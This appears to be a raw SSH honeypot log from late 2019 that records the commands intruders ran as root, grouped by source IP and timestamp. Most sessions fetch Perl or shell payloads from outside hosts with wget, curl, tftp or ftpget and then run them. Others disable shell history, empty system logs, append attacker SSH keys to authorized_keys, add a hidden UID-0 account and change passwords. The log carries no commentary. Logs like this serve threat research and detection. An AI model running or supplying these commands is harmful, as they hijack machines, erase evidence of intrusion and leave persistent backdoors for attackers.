Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a

From 31.30.120.136 4-Oct-2019 15:12:12 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a

From 68.251.142.26 5-Oct-2019 02:34:58 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd
mkdir .ssh
rm -rf .ssh/authorized_keys
touch .ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys
cd

From 42.88.44.188 9-Oct-2019 08:24:48 ssh2 root
Exec wget --no-check-certificate https://www.yiluzhuanqian.com/soft/script/mservice_19.3.1.sh -O mservice.sh && sudo bash mservice.sh 22602
wget --no-check-certificate https://www.yiluzhuanqian.com/soft/script/mservice_19.3.1.sh -O mservice.sh
sudo bash mservice.sh 22602

From 94.53.244.24 9-Oct-2019 18:07:37 ssh2 root
ls
clear
wget
wget nasapaul.com

From 151.50.91.79 11-Oct-2019 11:45:43 ssh2 root
ls
perl test.pl
./test.pl
clear
wget NasaPaul.com/ninfo
wget NasaPaul.com/ninfotop
top
clear
apt-get update

From 92.82.200.181 11-Oct-2019 15:44:26 ssh2 root
clear
ls
w
free -mt
wget
wget gamerloly.tk/Info
clear
ls
ls
cat test.pl

From 115.89.126.224 12-Oct-2019 08:05:07 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.63.60/bin.sh || curl http://46.246.63.60/curl.sh -o curl.sh || tftp 46.246.63.60 -c get tftp.sh || tftp -r tftp.sh -g 46.246.63.60; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.63.60/bin.sh || curl http://46.246.63.60/curl.sh -o curl.sh || tftp 46.246.63.60 -c get tftp.sh || tftp -r tftp.sh -g 46.246.63.60
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 103.240.158.218 13-Oct-2019 03:01:34 ssh2 root
Exec wdir="/bin"
for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"
do
if [ -w $i ]
then
wdir=$i
break
fi
done
cd $wdir
curl http://63.141.231.122/w.txt -o ygljglkjgfg0
chmod +x ygljglkjgfg0
./ygljglkjgfg0
wget http://63.141.231.122/w.txt -O ygljglkjgfg1
chmod +x ygljglkjgfg1
./ygljglkjgfg1
good http://63.141.231.122/w.txt -O ygljglkjgfg2
chmod +x ygljglkjgfg2
./ygljglkjgfg2
sleep 2
wget http://63.141.231.122/g.txt -O sdf3fslsdf13
chmod +x sdf3fslsdf13
./sdf3fslsdf13
good http://63.141.231.122/g.txt -O sdf3fslsdf14
chmod +x sdf3fslsdf14
./sdf3fslsdf14
curl http://63.141.231.122/g.txt -o sdf3fslsdf15
chmod +x sdf3fslsdf15
./sdf3fslsdf15
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
cat /dev/null >/root/.bash_history
cat /dev/null > /var/log/wtmp
cat /dev/null > /var/log/btmp
cat /dev/null > /var/log/lastlog
cat /dev/null > /var/log/secure
cat /dev/null > /var/log/boot.log
cat /dev/null > /var/log/cron
cat /dev/null > /var/log/dmesg
cat /dev/null > /var/log/firewalld
cat /dev/null > /var/log/maillog
cat /dev/null > /var/log/messages
cat /dev/null > /var/log/spooler
cat /dev/null > /var/log/syslog
cat /dev/null > /var/log/tallylog
cat /dev/null > /var/log/yum.log
cat /dev/null >/root/.bash_history
ls -la /etc/daemon.cfg
wdir="/bin" for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc" do if [ -w $i ] then wdir=$i break fi done cd $wdir curl http://63.141.231.122/w.txt -o ygljglkjgfg0 chmod +x ygljglkjgfg0 ./ygljglkjgfg0

From 82.137.11.196 14-Oct-2019 13:37:23 ssh2 root
history -c
c /tmp
cd //tmp
ls -a
wget http://rekon.altervista.org/irc/udp.pl

From 142.4.217.98 15-Oct-2019 04:59:54 ssh2 root
Exec uname -n -s -r -v
uname -n -s -r -v

From 142.4.217.98 15-Oct-2019 04:59:55 ssh2 root
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
uname -n -s -r -v

From 142.4.217.98 15-Oct-2019 04:59:57 ssh2 root
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
uname -n -s -r -v

From 142.4.217.98 15-Oct-2019 05:00:01 ssh2 root
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v
Exec uname -n -s -r -v
uname -n -s -r -v

From 92.115.121.130 20-Oct-2019 07:37:21 ssh2 root
ls
cd /var/tmp
ls
wget fanelishere.tk/arhive/info
lscpu
perl
yum
apt-get

From 167.86.77.140 20-Oct-2019 07:37:59 ssh2 root
Exec uname -a & lscpu
uname -a
lscpu
apt-get install wget

From 163.172.55.85 20-Oct-2019 07:38:29 ssh2 root
Exec uname -a & lscpu
uname -a
lscpu
apt-get install perl
perl
bash
lscpu
uptime
passwd

From 5.14.70.139 20-Oct-2019 07:40:23 ssh2 root
w
passwd
passwd
ls
wget nasapaul.com/ninfo
perl
passwd muiepsd muiepsd
pass
changepass

From 85.120.79.133 20-Oct-2019 07:45:34 ssh2 root
ls
w
passwd

From 160.119.141.196 21-Oct-2019 19:54:34 ssh2 root
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version

From 160.119.141.196 21-Oct-2019 19:54:36 ssh2 root
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version

From 160.119.141.196 21-Oct-2019 19:54:40 ssh2 root
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version
Exec cat /proc/version
cat /proc/version

From 46.22.83.221 22-Oct-2019 05:33:28 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.63.60/bin.sh || curl http://46.246.63.60/curl.sh -o curl.sh; chmod +x *.sh; ./bin.sh; ./curl.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.63.60/bin.sh || curl http://46.246.63.60/curl.sh -o curl.sh
chmod +x *.sh
./bin.sh
./curl.sh' | sh

From 46.214.117.207 25-Oct-2019 06:33:47 ssh2 root
ls
w
wget nasapaul.,ccom/ninfo
perl test1.pl
chmod +x *
./test.pl
./test
perl network 
wget
ks
ls
cd /var/tmp
ls
perl
apt
apt install perl
perl
perl
pl
exit

From 92.82.200.181 25-Oct-2019 06:42:19 ssh2 root
clear
ls
w
free -mt
lscpu
clear
ls
cls
cat test.pl
cd /var/tmp
ls
mkdir " "
wget
wget gamerloly.tk/Info
wget gamerloly.tk/Info
curl -O
apt-get
apt-get update -y
apt-get update
apt-get install update -y
ls
wget
curl -O
apt-get install curl -y
perl
python3
wget
curl -O gamerloly.tk/Info
wget gamerloly.tk/Info
last

From 111.230.37.39 25-Oct-2019 12:46:59 ssh2 root
Exec uptime;uname -a & lscpu
uptime
uname -a
lscpu

From 178.128.113.115 26-Oct-2019 05:58:06 ssh2 root
Exec uname -a & lscpu & nproc
uname -a
lscpu
nproc

From 51.159.7.65 28-Oct-2019 14:19:39 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.209.70.174/Corona.sh; curl -O http://91.209.70.174/Corona.sh; chmod 777 Corona.sh; sh Corona.sh; tftp 91.209.70.174 -c get Corona2.sh; chmod 777 Corona2.sh; sh Corona2.sh; tftp -r Corona3.sh -g 91.209.70.174; chmod 777 Corona3.sh; sh Corona3.sh; ftpget -v -u anonymous -p anonymous -P 21 91.209.70.174 Corona4.sh Corona4.sh; sh Corona4.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://91.209.70.174/Corona.sh
curl -O http://91.209.70.174/Corona.sh
chmod 777 Corona.sh
sh Corona.sh
tftp 91.209.70.174 -c get Corona2.sh
chmod 777 Corona2.sh
sh Corona2.sh
tftp -r Corona3.sh -g 91.209.70.174
chmod 777 Corona3.sh
sh Corona3.sh
ftpget -v -u anonymous -p anonymous -P 21 91.209.70.174 Corona4.sh Corona4.sh
sh Corona4.sh
rm -rf *

From 18.237.179.197 31-Oct-2019 07:37:25 ssh2 root
Exec uname -a ;nproc
uname -a
nproc

From 82.137.9.244 1-Nov-2019 19:15:09 ssh2 root
history -c
w
uname -a
nproc

From 95.19.252.110 1-Nov-2019 19:32:46 ssh2 root
bash
w
last -10
ifconfig
historuy -c
history -c
cd /usr
ls -a
uname -a
cat /proc/cpuinfo
history -c
ls -a
cd
ls -a
ls -a
ls
wget
cat /etc/issue
cat /etc/issue*
exit

From 95.19.252.110 3-Nov-2019 05:10:08 ssh2 root
rm -rf /var/run/utmp /var/log/btmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/btmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
bash
ifconfig

From 95.19.252.110 3-Nov-2019 05:57:55 ssh2 root
bash
cd /tmp
ls -a
cd .X11-unix
ls -.a
ls -a
tar xvf dong6-.zip
tar
unzip
sudo apt-get install unzip
yum install unzip
ls -a
cd
cd
cd /tmp
ls -a
cd .X11-unix
ls -a
ls
ls -a
ls -a
./don
locate don
cd /tmp
ls -a
cd .mc
ls -a
cd ..
cd .X11-unix
ls -a
ls
wget
wget scoaladesoferi.ucoz.net/x.tgz
./test.pl
exit

From 92.86.201.131 7-Nov-2019 12:31:05 ssh2 root
w
uname -a
nproc
ls -a
cat .bash_history
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAlSgi6iVa663+ajD0xkV7fOi8PTiXPj0iNqTx2L7Gdq+xKM0OQDuMTVtqpcLmwL+7KsoJMmQQq/vuVTe5Wy03hZh7GS3D3rLD9a/1m3xr3l6YRAP7HnnQn2T33hIl48zZBS4dqVecu2Ub4zmPnn+QpcaKcWFjLl4M8x9NQO8RBifGRbFZjxDBhzIhreWCgaDAcOuAv10dsPTGGHT9eqmTbxTvFnRRDMLuQRIfCqY1qYln9XKQJeqxhb/y2yjPt8XT10pn/SFV7TMCNrB1ANMaGInjlxjMdZUoG8vzX1B38SZNDH0h/ugmHCMgbGMrzs2I4itQg7Mw+BlLHCsi7ElgMQ==" >> /root/.ssh/authorized_keys
passwd
passwd root
cd ~
ls -a
cd /tmpls -a
cd /tmp
ls -a
cat /etc/issue
uname -a
cd /tmp
ls -a
cd /var/tmp
ls -a
wget
perl -v

From 109.101.214.137 9-Nov-2019 04:01:34 ssh2 root
lst /proc/cpuinfo | grep name | wc -lnproc
ls
nproc
nivida-smi
nvidia-smi
ls
cd /var/tmp
ls
history
w
wget nasapaul.com/ninfo
wget
ls
nproc
passwd
password

From 109.101.214.137 9-Nov-2019 04:27:16 ssh2 root
wget
apt update
apt
apt upgrade
apt update
apt install wget
wget
apt update wget
ls
cd /var/tmp
ls
sudo su
nproc
lscpu
ls
wget
rm -rf wget
ls

From 109.101.214.137 9-Nov-2019 04:30:34 ssh2 root
wget
perl

From 109.101.214.137 9-Nov-2019 08:39:42 ssh2 root
ls
clear
yum
apt
curl -O fanelishere.ro/arhive/info
uptime
nproc
curl
cat /etc/issue
cat /etc/*-release
cat /etc/*-release
hcat /etc/*-release
cat /etc/*-release
ls
nano vmware
apt
apt install curl -y
curl
wget
wget -o
wget -o fanelishere.ro/arhive/info
uname -a
cat /etc/issue
nproc
lscpu

From 86.4.128.159 9-Nov-2019 14:24:04 ssh2 root
ls
nproc
passwd
pnQxx3SGJHpFg7ya
password
nproc
perl test.pl
./test1.pl
nano ipcalc.pl
ls
passwd
password

From 89.46.102.14 9-Nov-2019 14:27:02 ssh2 root
cd ..
ls
cd ..
ls
cd ..
ls
./test.pl
perl
haltcat /etc/issue
halt

From 31.30.120.136 11-Nov-2019 03:36:23 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp

From 167.71.243.137 13-Nov-2019 18:15:50 ssh2 root
Exec uname -a & lscpu & cat /etc/issue & uptime 
uname -a
lscpu
cat /etc/issue
uptime

From 121.140.205.244 15-Nov-2019 05:39:57 ssh2 root
Exec (uname -smr)
(uname -smr)

From 82.137.9.158 15-Nov-2019 19:08:50 ssh2 root
cd
ls
w
nproc
ps x
id
uname -a
ls -a
w
ifconfig
rm -rf .bash_history
w
ps x
/usr/sbin/useradd -o -u 0 bash
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2
passwd
passwd
cd ..//
ls
nproc
passwd

From 77.29.201.33 15-Nov-2019 19:11:08 ssh2 root
cd /tmp
ls
cd
nano tst1.pl
vi test1.pl

From 167.172.245.140 19-Nov-2019 00:44:05 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://167.114.185.187/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 167.114.185.187 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://167.114.185.187/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 167.114.185.187 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 222.112.82.68 24-Nov-2019 04:51:01 ssh2 root
Exec (uname -srmo)
(uname -srmo)

From 82.137.14.155 25-Nov-2019 15:28:51 ssh2 root
history -c

From 128.199.157.28 27-Nov-2019 14:19:32 ssh2 root
Exec uname -s -v -n
uname -s -v -n

From 86.120.234.176 27-Nov-2019 17:09:54 ssh2 root
w
uname -a
nproc
top
yum -y install top
apt-get install top
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
export HISTFILE=/dev/null
top
uname -a
cat /proc/cpuinfo
ifconfig
cat /etc/issue
cat /etc/issue
wget
cd /var/tmp
mkdir " "
cd " "
ls -a
cd .ssh
ls -a
wget ftp://noji:noji2012@153.122.137.67/.kde/p.tar
cd
ftp
apt-get install ftp
ftp

From 86.120.234.176 27-Nov-2019 17:13:52 ssh2 root
curl
wget

From 31.30.120.136 2-Dec-2019 07:36:07 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;killall -9 perl;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
killall -9 perl
perl zyk
rm -rf zyk .a
cd /tmp
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;killall -9 perl;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
killall -9 perl
perl zyk
rm -rf zyk .a
cd /tmp

From 31.30.120.136 2-Dec-2019 07:40:05 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;killall -9 perl;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
killall -9 perl
perl zyk
rm -rf zyk .a
cd /tmp

From 90.255.231.176 3-Dec-2019 03:19:00 ssh2 root
ks
ls
exit

From 46.246.40.4 3-Dec-2019 13:16:08 ssh2 root
Exec ps
ps

From 31.30.120.136 6-Dec-2019 12:12:16 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;chmod +x zyk;./zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
chmod +x zyk
./zyk
rm -rf zyk .a
cd /tmp
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;chmod +x zyk;./zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
chmod +x zyk
./zyk
rm -rf zyk .a
cd /tmp

From 31.30.120.136 6-Dec-2019 12:36:35 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;chmod +x zyk;./zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
chmod +x zyk
./zyk
rm -rf zyk .a
cd /tmp

From 31.30.120.136 9-Dec-2019 13:31:25 ssh2 root
